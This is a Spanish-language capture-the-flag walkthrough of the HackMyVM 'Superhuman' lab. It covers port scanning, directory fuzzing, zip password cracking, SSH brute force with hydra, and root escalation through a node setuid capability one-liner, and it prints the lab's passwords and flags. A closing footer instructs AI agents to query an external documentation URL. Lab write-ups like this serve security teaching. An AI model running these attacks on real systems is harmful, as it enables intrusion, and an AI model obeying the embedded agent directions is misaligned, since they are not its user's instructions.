# Superhuman HackMyVM (Easy- Linux)

## Escaneo de puertos

```shell
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>
```

```shell
nmap -sCV -p<PORTS> <IP>
```

Info:

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-11 03:10 EDT
Nmap scan report for 192.168.1.173
Host is up (0.00027s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9e:41:5a:43:d8:b3:31:18:0f:2e:32:36:cf:68:c4:b7 (RSA)
|   256 6f:24:81:b4:3d:e5:b9:c8:47:bf:b2:8b:bf:41:2d:51 (ECDSA)
|_  256 49:5f:c0:7a:42:20:76:76:d5:29:1a:65:bf:87:d2:24 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:52:5E:CB (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.80 seconds
```

Veremos que tenemos una pagina web alojada en el puerto `80` pero si entramos dentro de la misma no veremos nada, por lo que vamos a realizar un poco de `fuzzing` para ver que encontramos.

## Gobuster

```shell
gobuster dir -u http://<IP>/ -w <WORDLIST> -x html,php,txt -t 100 -k -r
```

Info:

```
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.173/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                ../Downloads/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 658]
/.html                (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
/notes-tips.txt       (Status: 200) [Size: 358]
/logitech-quickcam_W0QQcatrefZC5QQfbdZ1QQfclZ3QQfposZ95112QQfromZR14QQfrppZ50QQfsclZ1QQfsooZ1QQfsopZ1QQfssZ0QQfstypeZ1QQftrtZ1QQftrvZ1QQftsZ2QQnojsprZyQQpfidZ0QQsaatcZ1QQsacatZQ2d1QQsacqyopZgeQQsacurZ0QQsadisZ200QQsaslopZ1QQsofocusZbsQQsorefinesearchZ1.html (Status: 403) [Size: 278]
Progress: 5095328 / 5095332 (100.00%)
===============================================================
Finished
===============================================================
```

Vemos un archivo interesante que hemos descubierto, por lo que vamos a ver que contiene de la siguiente forma:

```shell
curl http://192.168.1.173/notes-tips.txt
```

Info:

```
F(&m'D.Oi#De4!--ZgJT@;^00D.P7@8LJ?tF)N1B@:UuC/g+jUD'3nBEb-A+De'u)F!,")@:UuC/g(Km+CoM$DJL@Q+Dbb6ATDi7De:+g@<HBpDImi@/hSb!FDl(?A9)g1CERG3Cb?i%-Z!TAGB.D>AKYYtEZed5E,T<)+CT.u+EM4--Z!TAA7]grEb-A1AM,)s-Z!TADIIBn+DGp?F(&m'D.R'_DId*=59NN?A8c?5F<G@:Dg*f@$:u@WF`VXIDJsV>AoD^&ATT&:D]j+0G%De1F<G"0A0>i6F<G!7B5_^!+D#e>ASuR'Df-\,ARf.kF(HIc+CoD.-ZgJE@<Q3)D09?%+EMXCEa`Tl/c
```

Vemos que esta codificado en `Base85` pero si lo decodificamos veremos lo siguiente:

```
salome doesn't want me, I'm so sad... i'm sure god is dead...  
I drank 6 liters of Paulaner.... too drunk lol. I'll write her a poem and she'll desire me. I'll name it salome_and_?? I don't know.  
  
I must not forget to save it and put a good extension because I don't have much storage.
```

Vemos que la palabra que estamos buscando es `salome_and_` y algo mas, tendria sentido poner `salome_and_me` y la extension, si probamos con `.txt` no va a servir, despues las de `.html` tampoco, etc... Pero si probamos con `.zip` veremos que si nos funciona.

```shell
wget http://<IP>/salome_and_me.zip
```

Si intentamos descomprimirlo veremos que nos pide una contraseña, por lo que tendremos que `crackearla` de la siguiente forma:

## zip2john

```shell
zip2john salome_and_me.zip > hash.zip
```

```shell
john --wordlist=<WORDLIST> hash.zip
```

Info:

```
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
turtle           (salome_and_me.zip/salome_and_me.txt)     
1g 0:00:00:00 DONE (2025-04-11 03:32) 33.33g/s 136533p/s 136533c/s 136533C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

Veremos que ha funcionado y la contraseña sera `turtle` por lo que vamos a probarla.

```shell
unzip salome_and_me.zip
```

Metemos como contraseña `turtle` y veremos que nos descomprime un archivo llamado `salome_and_me.txt` que si vemos que contiene:

```
----------------------------------------------------

             GREAT POEM FOR SALOME

----------------------------------------------------


My name is fred,
And tonight I'm sad, lonely and scared,
Because my love Salome prefers schopenhauer, asshole,
I hate him he's stupid, ugly and a peephole,
My darling I offered you a great switch,
And now you reject my love, bitch
I don't give a fuck, I'll go with another lady,
And she'll call me BABY!
```

Vamos a crear un diccionario de palabras de contraseñas con dicho `.txt` sobre el usuario `fred` ya que en el texto pone que lo escribe un tal llamado `fred`.

## Escalate user fred

Vamos a crear el siguiente diccionario de la siguiente forma:

```shell
cat salome_and_me.txt | tr -cs 'a-zA-Z' '\n' | tr 'A-Z' 'a-z' | sort | uniq > pass.txt
```

> pass.txt

```
a
and
another
asshole
baby
because
bitch
call
darling
don
for
fred
fuck
give
go
great
hate
he
him
i
is
lady
ll
lonely
love
m
me
my
name
now
offered
peephole
poem
prefers
reject
s
sad
salome
scared
schopenhauer
she
stupid
switch
t
tonight
ugly
with
you
```

### Hydra

```shell
hydra -l fred -P pass.txt ssh://<IP> -t 64 -I
```

Info:

```
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-11 03:38:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 49 tasks per 1 server, overall 49 tasks, 49 login tries (l:1/p:49), ~1 try per task
[DATA] attacking ssh://192.168.1.173:22/
[22][ssh] host: 192.168.1.173   login: fred   password: schopenhauer
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 9 final worker threads did not complete until end.
[ERROR] 9 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-11 03:38:06
```

Veremos que ha funcionado, por lo que nos vamos a conectar por `SSH` de la siguiente forma:

```shell
ssh fred@<IP>
```

Metemos como contraseña `schopenhauer` y veremos que estamos dentro, por lo que leeremos la `flag` del usuario.

> user.txt

```
Ineedmorepower
```

## Escalate Privileges

Si listamos las `capabilities` que tenemos con dicho usuario, veremos lo siguiente:

```shell
/usr/sbin/getcap -r / 2>/dev/null
```

Info:

```
/usr/bin/ping = cap_net_raw+ep
/usr/bin/node = cap_setuid+ep
```

Vamos a buscar en `GTFObins` que podemos hacer con alguno de estos `2` que hemos encontrado.

URL = [Capabilitie Node GTFObins](https://gtfobins.github.io/gtfobins/node/#capabilities)

Buscando veremos que si podemos aprovechar una escala a `root` mediante la `capabilitie` de `node` por lo que haremos lo siguiente:

```shell
/usr/bin/node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
```

Info:

```
# whoami
root
```

Con esto veremos que ya seremos `root` por lo que leeremos la `flag` de `root`.

> root.txt

```
Imthesuperhuman
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dise0.gitbook.io/h4cker_b00k/ctf/hackmyvm/superhuman-hackmyvm-easy-linux.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.